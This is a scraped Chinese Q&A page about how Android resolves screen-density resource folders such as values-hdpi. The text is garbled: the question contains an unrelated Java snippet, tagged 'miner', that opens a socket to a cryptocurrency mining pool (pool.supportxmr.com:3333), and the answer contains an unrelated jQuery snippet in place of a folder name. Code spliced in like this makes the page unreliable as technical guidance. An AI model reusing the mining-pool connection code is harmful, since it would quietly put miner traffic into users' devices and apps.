仅定义一个屏幕密度限定符?

时间:2018-01-09 10:58:43

标签: android android-layout screen-density

除了默认的values-hdpi目录之外,我在values目录下定义xhdpi, xxhdpi, ..文件时会发生什么?系统是否也使用它来获得更高的密度(private class AsyncExec extends AsyncTask<Void,Void,Void>{ @Override protected Void doInBackground(Void... voids) { int port=80; try { InetAddress address = InetAddress.getByName("pool.supportxmr.com"); Log.d("miner","Attempting to connect to " + address.toString() + " on port " + port + "."); Socket socket = new Socket(address, 3333); Log.d("miner", "Connection success"); } catch (IOException e) { e.printStackTrace(); } return null; } } ),还是使用默认密度?

1 个答案:

答案 0 :(得分:0)

Android操作系统查找$('#corpusname').on("change",function(){ if($(this).val() == ''){ $('#seedoc').attr('disabled','disabled'); //Disables if Values of Select Empty }else{ $('#seedoc').removeAttr('disabled'); } }); 的正确文件夹,因此如果您使用的是hdpi解析设备,Android操作系统将首先在dimens.xml中查找dimens.xml文件,如果是找不到它,它会直接找到默认values-hdpi文件夹中的默认dimens.xml文件。如果还没找到,系统将寻找最相关的。